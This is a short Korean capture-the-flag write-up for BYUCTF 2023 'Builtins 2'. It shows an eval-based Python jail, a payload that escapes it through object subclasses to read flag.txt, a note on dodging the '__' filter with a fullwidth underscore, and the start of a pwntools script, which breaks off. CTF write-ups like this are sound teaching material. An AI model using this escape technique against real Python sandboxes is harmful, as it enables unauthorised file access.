CTF/BYUCTF 2023
[BYUCTF 2023] Builtins 2
Prob inp = input("code> ")[:72] if "__" in inp: print("Nope") else: print(eval(inp, {"__builtins__": {}}, {"__builtins__": {}})) Payload ().__class__.__bases__[0].__subclasses__()[124].get_data('.','flag.txt') 이 페이로드는 __ 필터링을 우회하는 방법으로 "_", "_" 은 다릅니다. 비슷해 보이지만 같지는 않습니다. 전각 문자 _는 첫 번째 문자가 아니라 두 번째 문자여야 합니다. 일반 밑줄 다음에 두 번째 유니코드가 오는 경우에만 작동합니다. Exploit from pwn import * p = remote("byuctf.xyz", 40..
2023. 5. 21.